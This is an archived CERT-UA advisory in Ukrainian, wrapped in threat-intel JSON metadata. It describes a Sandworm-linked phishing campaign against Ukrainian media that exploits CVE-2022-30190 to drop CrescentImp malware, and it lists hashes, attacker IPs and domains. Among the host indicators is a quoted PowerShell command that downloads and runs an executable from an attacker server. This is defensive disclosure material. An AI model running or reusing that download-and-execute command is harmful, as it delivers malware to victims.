{ "id": "18dd5f80-8f53-4bd8-bd9f-f8d44dd1a94c", "created_at": "2026-04-06T00:22:02.97997Z", "updated_at": "2026-04-10T03:30:30.471787Z", "deleted_at": null, "sha1_hash": "c2f5333b929b50d20b86e841e75155f4ce3cb815", "title": "CERT-UA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1255740, "plain_text": "CERT-UA\r\nArchived: 2026-04-05 23:44:19 UTC\r\nЗагальна інформація\r\nУрядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA від учасника\r\nінформаційного обміну отримано інформацію щодо масового розсилання електронних листів, зокрема,\r\nсеред медійних організацій України (радіостанції, газети, новинні агенції та інші) з темою \"СПИСОК\r\nпосилань на інтерактивні карти\". Встановлено більше 500 електронних адрес отримувачів.\r\nУ додатку лист містив документ \"СПИСОК_посилань_на_інтерактивні_карти.docx\", відкриття якого\r\nпризведе до завантаження HTML-файлу та виконання JavaScript-коду, що, в свою чергу, забезпечить\r\nзавантаження та виконання EXE-файлу \"2.txt\", що класифіковано як шкідливу програму CrescentImp\r\n(дослідження триває).\r\nЗловмисники продовжують використовувати вразливість CVE-2022-30190 та все частіше вдаються до\r\nрозсилань електронних листів зі скомпрометованих електронних адрес державних органів.\r\nУ випадку виявлення ознак компрометації за наданими індикаторами просимо терміново інформувати.\r\nАктивність відстежується за ідентифікатором UAC-0113 (з середнім рівнем впевненості асоційовано з\r\nгрупою Sandworm).\r\nІндикатори компрометації\r\nФайли:\r\ncc27122efef26fa2b4cc5d30845704e7 129073fd0f9234737ff8ca1aadd8cbaef664015d1088d68e8e501fa757c991d0\r\n106d1413f8768be03cb7dc982a1455f9 22d413e4b4fb45f058c312942fb170c2225ab7f30a653d3aeba79c054837b297\r\n32ed33d2723251046168fa9ab2016b65 e5f2033a86429f7921449397f3ca06dd92ff14ba35e013fcfdc47d4c4736d046\r\n3e8ee32c4a5c24dbfe4e3ded8b8dc9e5 03700e0d02a6a1d76ecaa4d8307e40f76e07284646b3c45693054996f2e643d7\r\n156c8c604c209248b1dd0fe757960726 24811e849a7a0e73788bc893bed81b88405883eb9114557eacd26a90c2a81c29\r\n4825e7df93d8acb3dd236cc14c342a71 c84bbfce14fdc65c6e738ce1196d40066c87e58f443e23266d3b9e542b8a583e\r\n3f92f5020650fbf965ee3d0a8b920058 1373da91522f7f854f6d5c6d248d8496ebd7bc004651e73dc9325c10ee8ea05a\r\nХостові:\r\nInvoke-WebRequest -Uri hxxp://185[.]80.92.143:8998/2.txt -OutFile C:\\Users\\Public\\chkdsk.exe;Invoke-E\r\nC:\\Users\\Public\\chkdsk.exe\r\n%APPDATA%\\chkdsk.exe\r\nHKCU\\Software\\Classes\\\u003cZWXpSjTw3bwSniATW8SN\u003e\\\r\nhttps://cert.gov.ua/article/160530\r\nPage 1 of 2\n\nWindows check disk (назва служби)\r\n999bpJZ1MYwlDF42cztG (м'ютекс; не використовується)\r\nМережеві:\r\nhxxp://185[.]80.92.143:8998/update.html\r\nhxxp://185[.]80.92.143:8998/2.txt\r\nhxxps://87[.]236.161.43/i\r\n185[.]80.92.143\r\n87[.]236.161.43\r\nhXXp://72[.]167.223.219/MSDriverLoader[.]exe\r\nhXXp://203[.]96.191.70/MSDriverMonitor[.]exe\r\nhXXps://star-cz.ddns[.]net/requestgeoSqlUniversalwordpress.php\r\n72[.]167.223.219\r\n203[.]96.191.70\r\nstar-cz.ddns[.]net\r\nГрафічні зображення\r\nSource: https://cert.gov.ua/article/160530\r\nhttps://cert.gov.ua/article/160530\r\nPage 2 of 2", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cert.gov.ua/article/160530" ], "report_names": [ "160530" ], "threat_actors": [ { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434922, "ts_updated_at": 1775791830, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c2f5333b929b50d20b86e841e75155f4ce3cb815.pdf", "text": "https://archive.orkl.eu/c2f5333b929b50d20b86e841e75155f4ce3cb815.txt", "img": "https://archive.orkl.eu/c2f5333b929b50d20b86e841e75155f4ce3cb815.jpg" } }